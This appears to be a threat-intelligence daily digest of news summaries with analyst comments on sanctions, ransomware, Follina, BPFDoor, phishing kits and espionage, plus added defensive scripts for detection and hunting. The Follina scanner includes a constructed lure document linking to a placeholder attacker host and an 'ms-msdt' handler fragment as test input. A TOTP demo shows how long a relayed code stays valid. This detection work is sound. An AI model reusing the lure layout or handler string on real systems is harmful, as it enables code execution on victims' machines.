Daily Drop (487): Is SA Arming RU, XWorm Malware, Economic sanctions on RU, Critical US Cyber Protections, G-7 Discussions, Bl00dy Ransomware, Germany's Chip Fabs, EU Alert Infrastructure
05-13-2023
Saturday, May 13, 2023 // (IG): BB // Cloak & Dagger// Coffee for Bob
Is South Africa Supplying Weapons To Russia
Analyst Comments: The claims made by the U.S. ambassador against South Africa could profoundly impact the diplomatic and commercial ties between the two nations. If verified, these claims could adversely affect South Africa's global reputation and its financial relationships with Western countries, notably the U.S., one of its major trading allies. The public disclosure of the allegations and the potential for sanctions or trade restrictions have already begun to erode investor confidence, further straining the South African economy. South Africa's initiation of an investigation into the claims demonstrates its commitment to preserving its relations with the U.S. and the West and its intent to dispel these accusations. However, the U.S.'s failure to provide solid evidence may exacerbate the situation. If no compelling evidence is brought forth, it might strain the relationship between the U.S. and South Africa and bring the authenticity of the claims into question.
FROM THE MEDIA: The U.S. ambassador to South Africa, Reuben Brigety, has accused South Africa of supplying weapons to Russia, heightening fears of potential sanctions from Washington. The allegations revolve around a Russian ship, which is under U.S. sanctions, reportedly collecting weapons from a naval base near Cape Town in December. South Africa has denied these allegations and announced an inquiry led by a retired judge to investigate the issue. The South African foreign minister summoned Brigety to express displeasure over his statements. The U.S. State Department has reiterated cooperation on shared priorities, including health, trade, and energy. The Russian ship "Lady R," linked to a sanctioned company, reportedly left Simon's Town and sailed north to Mozambique and Port Sudan before arriving in the Russian port of Novorossiysk on the Black Sea. There are concerns that countries providing material support to Russia may be denied access to U.S. markets, a possibility that has alarmed investors and negatively impacted South Africa's currency, the rand.
READ THE STORY: Reuters
XWorm Malware Exploits Follina Vulnerability in New Wave of Attacks
Analyst Comments: This ongoing phishing campaign, dubbed MEME#4CHAN, presents a significant threat to its targeted sectors, particularly manufacturing and healthcare in Germany. The unusual attack chain, meme-laden PowerShell code carrying a heavily obfuscated XWorm payload, points to adaptable and reasonably skilled operators. The use of Follina (CVE-2022-30190, the Windows MSDT protocol-handler flaw triggered from Office documents) is concerning because a patch has been available since June 2022, yet the lure still yields code execution on unpatched hosts; it is the PowerShell stage that follows, not the Word exploit itself, that bypasses the Antimalware Scan Interface and disables Microsoft Defender. The chain shows how threat actors routinely layer a year-old initial-access bug with post-exploitation evasion to get past standard endpoint controls, and why patch currency on user workstations still matters.
FROM THE MEDIA: Cybersecurity researchers from Securonix have identified an ongoing phishing campaign, nicknamed MEME#4CHAN, primarily targeting manufacturing and healthcare companies in Germany. The campaign employs an unusual approach that involves meme-filled PowerShell code and a highly obfuscated XWorm payload. The attack begins with phishing emails carrying weaponized Microsoft Word documents that exploit the Follina vulnerability (CVE-2022-30190) to install an obfuscated PowerShell script. This script is then used to bypass the Antimalware Scan Interface, disable Microsoft Defender, establish persistence on the targeted system, and launch the XWorm malware. XWorm is a versatile commodity malware, available for purchase on underground forums, capable of performing a variety of malicious operations, including data theft, DDoS attacks, ransomware attacks, and the ability to spread via USB and drop additional malware.
READ THE STORY: THN
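The delivery stage described above (a Word document that reaches out to an external HTML page, which in turn invokes the MSDT protocol handler) leaves a recognisable footprint inside the .docx container that a mail gateway or triage script can check before the file ever reaches Word. The script below is an added example, not Securonix's or the article's code. It inspects the package relationships for a linked (not embedded) OLE object with an external http(s) target and the document body for a linked "htmlfile" OLE object, and separately flags the `ms-msdt:` handler in a fetched HTML stage. The two sample documents and the HTML fragment are constructed inline (attacker.invalid is a placeholder) so it runs offline.

```python
"""Static triage of .docx files for the Follina (CVE-2022-30190) lure layout.

Added example, not code from the original page or from Securonix. Indicators are
the publicly documented Follina document structure; sample inputs are constructed.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")
OFFICE_NS = "urn:schemas-microsoft-com:office:office"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
MSDT_RE = re.compile(r"ms-msdt:|PCWDiagnostic", re.IGNORECASE)


def scan_docx(data: bytes) -> list:
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        # 1. Relationships: an OLE object whose target lives outside the package.
        rels_name = "word/_rels/document.xml.rels"
        if rels_name in names:
            root = ET.fromstring(z.read(rels_name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") != OLE_REL_TYPE:
                    continue
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and re.match(r"https?://", target, re.I):
                    findings.append(f"external OLE link {rel.get('Id')} -> {target}")
        # 2. Body: a *linked* OLE object hosted by the HTML control (ProgID htmlfile).
        doc_name = "word/document.xml"
        if doc_name in names:
            root = ET.fromstring(z.read(doc_name))
            for obj in root.iter(f"{{{OFFICE_NS}}}OLEObject"):
                if obj.get("Type") == "Link" and obj.get("ProgID", "").lower() == "htmlfile":
                    findings.append(f"linked htmlfile OLE object (UpdateMode={obj.get('UpdateMode')})")
    return findings


def scan_html_stage(html: str) -> bool:
    """True if a fetched second-stage page hands control to the MSDT handler."""
    return MSDT_RE.search(html) is not None


def _build_docx(rels_xml: str, document_xml: str) -> bytes:
    """Assemble a minimal .docx (zip) in memory for the constructed samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", document_xml)
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed lure mirroring the public Follina layout; the URL is a placeholder.
MALICIOUS_DOCX = _build_docx(
    f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId996" Type="{OLE_REL_TYPE}" '
    'Target="http://attacker.invalid/stage.html!" TargetMode="External"/></Relationships>',
    f'<w:document xmlns:w="{W_NS}" xmlns:o="{OFFICE_NS}" xmlns:r="{R_NS}"><w:body><w:p><w:r>'
    '<w:object><o:OLEObject Type="Link" ProgID="htmlfile" r:id="rId996" UpdateMode="OnCall"/>'
    '</w:object></w:r></w:p></w:body></w:document>',
)

# Constructed benign document: an ordinary embedded image relationship.
BENIGN_DOCX = _build_docx(
    f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId4" '
    f'Type="{R_NS}/image" Target="media/image1.png"/></Relationships>',
    f'<w:document xmlns:w="{W_NS}"><w:body/></w:document>',
)

# Constructed fragment of what the external page would contain (indicator only).
STAGE_HTML = '<script>window.location.href = "ms-msdt:/id PCWDiagnostic /skip force";</script>'

if __name__ == "__main__":
    for label, doc in (("lure", MALICIOUS_DOCX), ("benign", BENIGN_DOCX)):
        print(label, scan_docx(doc) or "clean")
    print("html stage flagged:", scan_html_stage(STAGE_HTML))
```

Both checks are structural, so they survive the PowerShell obfuscation the campaign relies on later in the chain; they do not, however, catch RTF variants that fetch the same handler through a different wrapper, so treat a clean result as one signal rather than a verdict.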
Swiss tech giant ABB confirms ‘IT security incident’
Analyst Comments: The cyberattack on ABB highlights the continued threat posed by ransomware groups and the potential for significant disruptions to critical infrastructure and industrial systems. ABB's collaboration with governments and its extensive customer base make it an attractive target for cybercriminals. The incident underscores the importance of robust cybersecurity measures and the need for organizations to regularly update their defenses to mitigate the risk of such attacks. The involvement of the Black Basta group, previously linked to FIN7, indicates the interconnected nature of cybercriminal operations and the need for coordinated efforts to disrupt their activities. As ABB works to address the incident, it is crucial that they prioritize the protection of sensitive data and ensure minimal impact on their customers and partners.
FROM THE MEDIA: Swiss technology conglomerate ABB has confirmed that it is dealing with an "IT security incident" that has affected some of its offices and systems worldwide. Anonymous sources have reported that the Black Basta ransomware group targeted ABB's Windows Active Directory, impacting hundreds of devices. While ABB has not explicitly confirmed whether ransomware was involved, it has taken measures to contain the incident and address disruptions to its operations. ABB works with governments globally and serves large manufacturers, and it has stated that the majority of its systems are now operational. The Black Basta group has previously targeted organizations such as the American Dental Association and Deutsche Windtechnik.
READ THE STORY: The Record
Why the economic war against Russia has failed
Analyst Comments: The effectiveness of the Western sanctions against Russia is subject to debate. On one hand, they have certainly created challenges for the Russian economy and have been a strong political statement against Russia's actions. On the other hand, as The Spectator article points out, they may have underestimated the resilience of the Russian economy and the potential for non-Western countries to fill the void left by reduced Western trade. This situation underscores the complexity of global economics and the difficulty of achieving comprehensive and effective economic isolation in a globalized world. It highlights the need for a more nuanced understanding of the global influence of the West and potential countermeasures when implementing sanctions. Ultimately, the impact of these sanctions may only be fully understood with the benefit of hindsight.
FROM THE MEDIA: The Western sanctions against Russia were intended to isolate the country economically. However, an article in The Spectator suggests that these measures have not been as effective as anticipated. While there has been a decrease in fossil fuel imports from Russia to the UK and the EU, Russia has significantly increased its exports to countries like China and India, which have shown reluctance to join the West's sanctions. Furthermore, evidence suggests that goods initially exported to countries bordering Russia, such as Kazakhstan and Armenia, may end up in Russia itself. The article also criticizes the West's focus on targeting wealthy Russians with sanctions, arguing that these individuals have the means to access Western goods through diverted trade. Consequently, the Russian economy has not collapsed but rather shifted its orientation towards non-Western markets.
READ THE STORY: Modern Diplomacy
A Republican-Led Lawsuit Threatens Critical US Cyber Protections
Analyst Comments: This lawsuit underscores the vulnerability of the Biden Administration's cybersecurity strategy, which has been implemented via regulatory directives rather than explicit congressional authorization. If the lawsuit succeeds, it could set a precedent for other Republican-led states and business groups to challenge regulations designed to guard against cyber threats. The case also highlights the ongoing debate about the role of government in securing privately owned infrastructure and the delicate balance between regulatory oversight and state sovereignty. The outcome could significantly impact the development of cybersecurity regulations and the overall national cybersecurity strategy. The fact that agencies are crafting cybersecurity regulations without explicit congressional authorization leaves them vulnerable to legal challenges. This could slow down the implementation of vital cybersecurity measures and increase the risk of cyberattacks on critical infrastructure.
FROM THE MEDIA: The Biden Administration's efforts to improve the cybersecurity of U.S. critical infrastructure have led to a major lawsuit, with potential implications for the federal government's capacity to protect vital facilities and systems. The attorneys general of Arkansas, Iowa, and Missouri have filed a lawsuit against a new Environmental Protection Agency (EPA) requirement for states to evaluate the cybersecurity practices of water systems during regular inspections. The lawsuit could have implications beyond the water sector, as other agencies are watching closely while they formulate regulations for other crucial infrastructure, such as hospitals and emergency broadcast systems.
READ THE STORY: Wired
New Stealthy Variant of Linux Backdoor BPFDoor Emerges from the Shadows
Analyst Comments: The existence and longevity of BPFDoor underscore the sophistication of this malware, highlighting the increasing trend of threat actors developing tools targeting Linux systems due to their prevalence in enterprise and cloud environments. The stealthy nature of BPFDoor, particularly its ability to avoid detection by the majority of security vendors, poses a significant challenge to cybersecurity efforts. Organizations should strengthen their security measures, particularly on Linux systems, and stay updated on the latest threat intelligence to detect and mitigate such sophisticated threats. The growing complexity and stealthiness of such malware also suggest a need for improved detection methods and tools within the cybersecurity community.
FROM THE MEDIA: Deep Instinct, a cybersecurity firm, has discovered an undetected variant of a Linux backdoor malware, BPFDoor. This malware is linked to the Chinese threat actor group Red Menshen, known for targeting telecom providers in Asia and the Middle East since 2021. BPFDoor allows the threat actors persistent remote access to compromised systems, often going undetected for extended periods. This new version has improved its evasion tactics by removing many hard-coded indicators and integrating a static library for encryption and a reverse shell for command-and-control communication.
READ THE STORY: THN
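The summary above does not describe the implant's mechanism, but the trait the family is named for is well documented in prior public analyses: BPFDoor opens a raw AF_PACKET socket, attaches a Berkeley Packet Filter to it, and waits for a magic packet, so it never binds a TCP or UDP port and does not appear in a listening-port inventory. The script below is an added example, not Deep Instinct's code, showing the hunt a defender can run instead: enumerate raw packet sockets from /proc/net/packet and map each socket inode back to the owning process through /proc/<pid>/fd. The /proc/net/packet text and the inode-to-PID table used here are constructed so the example runs offline; on a live host, call find_packet_sockets() with no arguments.

```python
"""Hunt for BPFDoor-style implants: processes holding raw AF_PACKET sockets.

Added example, not code from the original page or from Deep Instinct. The
constructed SAMPLE text follows the kernel's /proc/net/packet format
(sk RefCnt Type Proto Iface R Rmem User Inode).
"""
import os
import re
from typing import Dict, List, Optional

SOCK_RAW = 3        # 'Type' column: 3 = SOCK_RAW, 2 = SOCK_DGRAM
ETH_P_ALL = 0x0003  # 'Proto' column is hex: 0003 = all frames
ETH_P_IP = 0x0800   #                        0800 = IPv4 only


def parse_proc_net_packet(text: str) -> List[dict]:
    """Parse /proc/net/packet rows into dicts; the first line is the header."""
    rows = []
    for line in text.splitlines()[1:]:
        parts = line.split()
        if len(parts) < 9:
            continue
        rows.append({
            "type": int(parts[2]),
            "proto": int(parts[3], 16),
            "iface": int(parts[4]),      # ifindex, 0 = not bound to one interface
            "running": parts[5] == "1",
            "inode": int(parts[8]),
        })
    return rows


def inode_to_pids(proc_root: str = "/proc") -> Dict[int, List[int]]:
    """Map socket inode -> PIDs holding it, by reading /proc/<pid>/fd symlinks."""
    mapping: Dict[int, List[int]] = {}
    for pid in os.listdir(proc_root):
        if not pid.isdigit():
            continue
        fd_dir = os.path.join(proc_root, pid, "fd")
        try:
            for fd in os.listdir(fd_dir):
                m = re.fullmatch(r"socket:\[(\d+)\]", os.readlink(os.path.join(fd_dir, fd)))
                if m:
                    mapping.setdefault(int(m.group(1)), []).append(int(pid))
        except OSError:
            continue  # process exited, or not readable without root
    return mapping


def find_packet_sockets(text: Optional[str] = None,
                        owners: Optional[Dict[int, List[int]]] = None) -> List[dict]:
    """Return raw packet sockets with their owning PIDs attached (live host if no args)."""
    if text is None:
        with open("/proc/net/packet") as f:
            text = f.read()
    if owners is None:
        owners = inode_to_pids()
    hits = []
    for row in parse_proc_net_packet(text):
        if row["type"] != SOCK_RAW:
            continue
        row["pids"] = owners.get(row["inode"], [])
        hits.append(row)
    return hits


# Constructed sample: one raw IPv4 socket on ifindex 2, one DGRAM socket on all frames.
SAMPLE = """sk               RefCnt Type Proto  Iface R Rmem   User   Inode
ffff9a1c3e2b0000 3      3    0800   2     1 0      0      40213
ffff9a1c3e2b8000 3      2    0003   0     1 0      0      40250
"""
SAMPLE_OWNERS = {40213: [1337], 40250: [812]}  # constructed inode -> PID table

if __name__ == "__main__":
    for hit in find_packet_sockets(SAMPLE, SAMPLE_OWNERS):
        print(f"raw packet socket inode={hit['inode']} proto=0x{hit['proto']:04x} "
              f"ifindex={hit['iface']} pids={hit['pids']}")
```

Every hit is a lead, not a verdict: tcpdump, DHCP clients, lldpd and some monitoring agents legitimately hold packet sockets. The discriminator is a process you cannot account for, typically with a benign-looking or spoofed name, holding a raw socket with no matching listening port, which is exactly the profile that lets this family sit undetected for long periods.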
G-7 Discussions Center on Fortifying Banks and Supply Chains as China Levels Charges of Hypocrisy Against the Group
Analyst Comments: The ongoing G-7 talks highlight the escalating geopolitical tensions and economic complexities facing the global community. The war of words between the G-7 and China underscores the deep-seated differences between the two, particularly regarding trade practices and respect for the rules-based international order. The accusations of economic coercion by China and the counterclaims of hypocrisy reflect the strained relations and the potential for economic conflict. The discussions about preventing countries from bypassing sanctions against Russia underline the G-7's commitment to addressing the Ukraine crisis and holding Russia accountable.
FROM THE MEDIA: The Group of Seven (G-7) is currently addressing a multitude of issues, with a focus on tensions with China and Russia, during their meeting in Japan, the only Asian member of the group. While G-7 finance ministers and central bank governors strategize on protecting the international rules-based order and preventing what they term "economic coercion" by China, Beijing accuses the group of hypocrisy. Chinese Foreign Ministry spokesperson, Wang Wenbin, argues that China is a victim of economic coercion and criticizes the U.S. for overstretching the concept of national security and imposing unfair measures against foreign companies. The G-7 leaders are also exploring ways to prevent countries from bypassing sanctions against Russia. The recent bank collapses in the U.S. and Europe and the potential U.S. default on the national debt add to the complexity of the discussions.
READ THE STORY: Spectrum Local News
'Very Noisy:' For the Black Hat NOC, It's All Malicious Traffic All the Time
Analyst Comments: The Black Hat Asia event presented a unique challenge in identifying genuine cybersecurity threats due to the high volume of simulated attacks and threat demonstrations. The presentation highlights the importance of robust and versatile network monitoring tools capable of sifting through high volumes of potentially malicious traffic to identify real threats. The number of security lapses detected, such as unencrypted data transmissions and VPN leaks, emphasizes the need for better data handling and encryption practices, even among cybersecurity vendors.
FROM THE MEDIA: At Black Hat Asia, Neil Wyler and Bart Stump presented an inside look into the event's network operations center (NOC). Due to the nature of the event, most of the network traffic is categorized as a severe cybersecurity threat, making it difficult to discern genuine threats. The NOC uses dashboards for real-time monitoring of network activity and relies on raw packet data to investigate suspicious activity. The event's NOC tracked 1,500 unique devices with 72% of the traffic encrypted. Several incidents were reported, including an individual generating significant malicious activity, VPN issues, and unencrypted data transmissions from vendors.
READ THE STORY: DARKReading
CISA warns of critical Ruckus bug used to infect Wi-Fi access points
Analyst Comments: The active exploitation of the CVE-2023-25717 vulnerability in the Ruckus Wireless Admin panel is a serious issue due to the potential for widespread disruption caused by DDoS attacks. The fact that the AndoryuBot botnet can be rented out to other cybercriminals increases the threat level, as it potentially allows a larger number of malicious actors to carry out damaging attacks. Despite a patch being available, the continued vulnerability of many Wi-Fi access points underscores the importance of timely patch management. Organizations, particularly federal agencies, should heed CISA's warning and ensure they have the necessary patches installed to mitigate this threat.
FROM THE MEDIA: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning about a critical remote code execution (RCE) vulnerability (CVE-2023-25717) in the Ruckus Wireless Admin panel that is being actively exploited by the AndoryuBot DDoS botnet. Although the flaw was patched in February 2023, many Wi-Fi access points remain unpatched and susceptible to infection. The botnet can be rented by cybercriminals looking to launch DDoS attacks, with payment accepted via CashApp or several cryptocurrencies. CISA has given U.S. Federal Civilian Executive Branch Agencies until June 2 to secure their devices against this RCE bug.
READ THE STORY: Bleeping Computer
South Korea alleges spies messaged North Korean handlers via YouTube comments
Analyst Comments: The charges of spying for North Korea by trade union leaders in South Korea raise significant concerns about national security and potential foreign influence. The use of covert communication methods and alleged espionage activities highlight the need for robust counterintelligence measures. The case also exposes political tensions, with the accusations being viewed through a partisan lens. The alleged involvement of union leaders, who hold positions of influence, further emphasizes the importance of maintaining vigilance against potential infiltration and protecting critical institutions. As the case unfolds, it is crucial for the legal process to proceed impartially and for any evidence of wrongdoing to be thoroughly evaluated.
FROM THE MEDIA: Four trade union leaders in South Korea, allegedly affiliated with the Korean Confederation of Trade Unions (KCTU), have been charged with spying for North Korea. The leaders are accused of communicating with their handlers by leaving coded comments on obscure YouTube videos. Prosecutors claim that the accused individuals were instructed to photograph military bases, incite anti-American and anti-Japanese sentiments, and use their union positions for espionage activities. The suspects, who have not been named, face charges under the National Security Act, which carries severe penalties. The case has sparked political controversy, with the ruling conservative administration accused of targeting opposition figures. The charges have been denounced by the center-left Democratic Party of Korea (DPK) as politically motivated.
READ THE STORY: The Record
UK cops score a legal win in EncroChat snooping op
Analyst Comments: The ruling represents a significant legal victory for the NCA, which has been using the obtained EncroChat communications as key evidence in its crackdown on organized crime. However, the decision to defer the question of illegal interception means that this case is not fully resolved, and further legal challenges could arise. The case underlines the ongoing tension between law enforcement agencies' need to combat serious crime and the legal and ethical issues surrounding the methods used to gather evidence.
FROM THE MEDIA: The UK's National Crime Agency (NCA) has partially won a legal battle challenging the warrants used to acquire messages from the cybercrime platform EncroChat. The Investigatory Powers Tribunal ruled that the NCA did not fail in its duty of candor when obtaining a targeted equipment interference (TEI) warrant to access private messages on EncroChat devices. These messages were used as evidence leading to nearly 3,000 arrests in the UK. The tribunal deferred the question of whether the NCA illegally intercepted communications during transmission until related criminal proceedings in the Crown Court are concluded.
READ THE STORY: The Register
A ransomware source code leak spawned at least 10 ‘Babuk’ imitators, researchers say
Analyst Comments: The reported increase in the use of leaked Babuk ransomware code to develop new ransomware families highlights the potential risks associated with code leaks. It illustrates how threat actors can leverage such leaks to enhance their capabilities and target a broader range of systems. This underscores the importance of robust cybersecurity measures to protect against evolving ransomware threats. The targeting of VMware ESXi systems by these new ransomware families also underscores the growing trend of cyberattacks targeting critical infrastructure and enterprise systems, which often have a more significant impact.
FROM THE MEDIA: Multiple threat actors have leveraged the Babuk ransomware source code, leaked in September 2021, to create up to nine new ransomware families. These families have the capability of targeting VMware ESXi systems. SentinelOne, a cybersecurity company, has identified an increasing trend of Babuk source code adoption from H2 2022 through H1 2023. The firm stated that the leaked code has allowed actors who may lack the expertise to write their own lockers to target Linux systems. Three ransomware strains that have emerged since the beginning of the year, Cylance, Rorschach (aka BabLock), and RTM Locker, are based on the leaked Babuk source code. Other ransomware families that have incorporated various Babuk features into their code include LOCK4, DATAF, Mario, Play, and Babuk 2023 (aka XVGV) ransomware. The report also noted that actors associated with Royal ransomware have extended their attack toolkit with an ELF variant that can target Linux and ESXi environments.
READ THE STORY: The Record
Enigmatic Hacking Group Operating in Ukraine
Analyst Comments: The reporting on Red Stinger provides a clear picture of the group's activities and of the uncertainties surrounding its motivations. The group's focus on stealthy techniques and operational security, as identified by Malwarebytes and Kaspersky, indicates a deliberate effort to remain covert. Its targets, which include both Ukrainian and pro-Russian entities, complicate any reading of its motives given the polarized nature of the conflict. The use of its own hacking tools and infrastructure, along with the deployment of malware known as "DBoxShell" or "Magic Box," demonstrates its technical capabilities. Analysis of the language used by the group offers some clues about its nationality, although a definitive conclusion cannot be reached. Overall, the assessment covers the key aspects of the situation while acknowledging the uncertainties involved.
FROM THE MEDIA: A newly discovered hacking group named "Red Stinger" or "Bad Magic" has been conducting cyberespionage operations targeting Ukrainian and pro-Russian entities. The motivations of the group remain unclear, given the polarized nature of the conflict. Malwarebytes and Kaspersky have identified the group's activities dating back to 2020, suggesting a focus on stealthy techniques and operational security. The victims of Red Stinger include central Ukrainian targets and individuals involved in Moscow's discredited referendums in Ukrainian territories. The group utilizes its own hacking tools and infrastructure, and the malware deployed is called "DBoxShell" or "Magic Box." The nationality of the group remains uncertain, although some clues suggest they may not be native English speakers.
READ THE STORY: BankInfoSec
Netgear Routers' Flaws Expose Users to Malware, Remote Attacks, and Surveillance
Analyst Comments: The discovery of multiple security flaws in Netgear RAX30 routers raises concerns about the vulnerability of these devices and the potential risks they pose to users' privacy and security. The ability to bypass authentication and achieve remote code execution highlights the critical nature of these vulnerabilities. Promptly updating the firmware to the latest version is crucial to mitigate the risks associated with these flaws. Netgear's response in releasing a patch demonstrates its commitment to addressing security concerns and protecting its customers. However, it is essential for users to remain vigilant and ensure their devices are regularly updated to stay protected from emerging threats.
FROM THE MEDIA: Multiple security vulnerabilities have been discovered in Netgear RAX30 routers which, when chained together, can bypass authentication and lead to remote code execution. The flaws, disclosed at the Pwn2Own hacking competition, enable attackers to monitor internet activity, redirect traffic to malicious websites, inject malware into network traffic, and gain control over networked smart devices. The chain consists of an information disclosure caused by missing authentication, a stack-based buffer overflow that enables an authentication bypass, an information disclosure from cleartext storage of the device configuration, and a command injection that yields remote code execution. Netgear has released firmware version 1.0.10.94 to address these issues, and users are advised to update their routers to mitigate potential risks.
READ THE STORY: THN
Kingston's SSD firmware has Coldplay lyrics hidden within it
Analyst Comments: The inclusion of Coldplay lyrics in Kingston's firmware is an intriguing and unexpected discovery. It is unclear why the lyrics were embedded in the firmware and whether they serve any functional purpose or were simply added as a prank. This incident highlights the need for thorough firmware analysis and raises concerns about the potential presence of undocumented or unauthorized content in firmware. Kingston's response to this finding and their explanation behind the presence of the lyrics will provide further insight into this peculiar situation.
FROM THE MEDIA: Security researcher Nicholas Starke discovered the lyrics of Coldplay's song "The Scientist" embedded within the firmware of Kingston's SSD controller. The lyrics were found in the firmware version "SKC2000_S2681103," used in Kingston's KC2000 product line of solid-state drives. The presence of song lyrics in firmware, particularly in a deeply embedded component like a storage controller, is highly unusual and raises questions about its purpose.
READ THE STORY: Bleeping Computer
Spanish Police Take Down Massive Cybercrime Ring, 40 Arrested
Analyst Comments: The arrest of members of the Trinitarians gang highlights the continued threat posed by organized cybercrime groups and their evolving tactics. The use of phishing and smishing techniques demonstrates the effectiveness of social engineering in luring victims into revealing sensitive information. This case serves as a reminder of the importance of cybersecurity awareness and the need for individuals to remain vigilant against suspicious messages and links. Additionally, the gang's use of stolen funds to finance illegal activities underscores the interconnected nature of cybercrime and other forms of criminality. Law enforcement's successful operation demonstrates the importance of international cooperation and the commitment to dismantling organized criminal networks.
FROM THE MEDIA: Spanish authorities have arrested 40 individuals linked to an organized crime gang called Trinitarians, including two hackers involved in bank scams through phishing and smishing techniques. The group defrauded over 300,000 victims, resulting in losses exceeding €700,000. The cybercriminals used SMS messages with bogus links, redirecting users to phishing panels disguised as legitimate financial institutions. By stealing victims' credentials, the gang compromised accounts to request loans and link cards to cryptocurrency wallets. The stolen funds were used to support the group's activities, including legal fees, money transfers to imprisoned members, and purchases of narcotics and weapons. The group also utilized a network of mules to receive and withdraw money from bank transfers and engaged in point-of-sale terminal scams. Law enforcement conducted searches, seizing computer equipment, cash, lock-picking tools, and documents revealing the gang's organizational structure.
READ THE STORY: THN
New Phishing-as-a-Service Platform Lets Cybercriminals Generate Convincing Phishing Pages
Analyst Comments: The emergence of the Greatness phishing-as-a-service platform demonstrates the growing sophistication and accessibility of phishing tools for cybercriminals. By providing pre-built decoy login pages and bypassing 2FA protections, this platform lowers the barrier to entry for conducting phishing attacks targeting Microsoft 365 users. The use of convincing login pages tailored to specific organizations increases the likelihood of victims falling for the scam. Organizations need to remain vigilant and implement multi-layered security measures to detect and prevent phishing attacks, including employee education, email filtering, and strong authentication protocols. Microsoft's efforts to enforce number matching in Authenticator push notifications are a positive step toward enhancing 2FA protections, but it is essential for users and organizations to stay informed about evolving phishing techniques and adopt the latest security practices to mitigate the risks.
FROM THE MEDIA: A new phishing-as-a-service (PhaaS) platform called Greatness has been used by cybercriminals to target Microsoft 365 users, making it easier for them to conduct phishing attacks. Greatness provides affiliates with attachment and link builders that create convincing decoy login pages, pre-filled with the victim's email address and displaying their company logo and background image. The campaigns involving Greatness have targeted organizations in the manufacturing, healthcare, and technology sectors, primarily in the US, UK, Australia, South Africa, and Canada. The platform allows attackers to bypass two-factor authentication (2FA) and harvest credentials and time-based one-time passwords (TOTPs) from victims. The phishing kits include an administration panel for the configuration and tracking of stolen information.
READ THE STORY: THN
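The reason a kit like Greatness can "bypass 2FA" by harvesting a time-based one-time password is that a TOTP is not bound to the session or the origin that requested it: any party who learns the six digits within the validity window can present them. The code below is an added example, not Greatness's code or Microsoft's verifier. It implements RFC 6238 TOTP (HMAC-SHA1, 30-second step), a server-side check with the usual plus-or-minus-one-step skew tolerance, and a helper that computes how long a code captured at a given instant remains usable by a relaying attacker. The secret is the RFC's published test key; the timestamps are constructed.

```python
"""Why a harvested TOTP works for a real-time phishing relay.

Added example, not code from the original page, from Greatness, or from any
vendor. RFC 6238 TOTP over HMAC-SHA1 with a 30-second step; the secret below is
the RFC 6238 Appendix B test key, not a real credential.
"""
import hashlib
import hmac
import struct

STEP = 30  # seconds per TOTP time step


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the big-endian counter, dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, unix_time: int, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP with the counter set to the current 30-second step."""
    return hotp(secret, unix_time // STEP, digits)


def verify(secret: bytes, code: str, now: int, skew_steps: int = 1, digits: int = 6) -> bool:
    """Server-side check: accept the current step and +/- skew_steps neighbours.

    Constant-time comparison avoids leaking how many digits matched.
    """
    current = now // STEP
    for counter in range(current - skew_steps, current + skew_steps + 1):
        if hmac.compare_digest(hotp(secret, counter, digits), code):
            return True
    return False


def relay_window_seconds(now: int, skew_steps: int = 1) -> int:
    """Seconds a code captured at `now` stays valid at a verifier with this skew."""
    step_end = (now // STEP + 1) * STEP
    return (step_end - now) + skew_steps * STEP


RFC_SECRET = b"12345678901234567890"  # RFC 6238 test key, not a real seed

if __name__ == "__main__":
    t = 1111111111                      # constructed: moment the victim types the code
    code = totp(RFC_SECRET, t)          # the kit captures this from the fake page
    print("captured code:", code)
    print("relayed 5 s later accepted:", verify(RFC_SECRET, code, t + 5))
    print("relayed 35 s later accepted:", verify(RFC_SECRET, code, t + 35))
    print("relayed 61 s later accepted:", verify(RFC_SECRET, code, t + 61))
    print("attacker window (s):", relay_window_seconds(t))
```

The numbers make the operational point: with the common one-step skew, a code typed at the very start of a step stays valid for nearly a minute, which is far longer than an automated proxy needs to replay it against the real Microsoft 365 login. Shrinking skew to zero narrows the window but cannot close it, since any code is valid for the remainder of its own step. That is why Authenticator number matching (the user must type a number shown by the real site, which the proxy cannot show) and FIDO2/WebAuthn (the assertion is bound to the origin) resist this kit while TOTP does not.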
Malicious Chatbots Target Casinos in Southeast Asia
Analyst Comments: The ChattyGoblin campaign demonstrates the evolving tactics of threat actors targeting the gambling industry in Southeast Asia. By leveraging chatbots to target customer support agents, the attackers aim to gain unauthorized access to gambling operations and potentially carry out further malicious activities. The use of password-protected archives and tools like SharpUnhooker and Cobalt Strike showcases the sophistication of the attackers. It is crucial for gambling operators in the region to enhance their cybersecurity defenses, including employee awareness training, robust access controls, and continuous monitoring of suspicious activities.
FROM THE MEDIA: A campaign called "ChattyGoblin" has been targeting customer support agents in Southeast Asian gambling operations since October 2021. Researchers at ESET have attributed the campaign to threat groups backed by China. The threat actors primarily rely on chat applications like Comm100 and LiveHelp100. In one attack on a gambling company in the Philippines, the attackers used a chatbot to distribute a dropper named "agentupdate_plugins.exe" via the LiveHelp100 chat application. The dropper deploys a second executable based on the SharpUnhooker tool, which then downloads the ChattyGoblin attack's second stage from a password-protected ZIP archive. The final payload is a Cobalt Strike beacon that communicates with a command-and-control server.
READ THE STORY: DARKReading
Silk Road scammer charged with narcotics trafficking and money laundering
